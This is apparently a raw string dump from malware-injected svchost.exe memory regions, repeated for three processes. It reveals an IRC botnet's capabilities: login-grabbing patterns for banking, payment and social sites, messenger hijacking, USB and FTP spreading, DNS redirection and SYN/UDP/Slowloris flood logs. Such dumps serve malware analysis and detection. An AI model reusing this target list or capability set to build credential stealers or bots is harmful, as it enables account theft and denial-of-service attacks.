%S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>svchost.exe_1016_rwx_00AD0000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>svchost.exe_1100_rwx_02340000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL05</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\System32\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>svchost.exe_1148_rwx_007F0000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>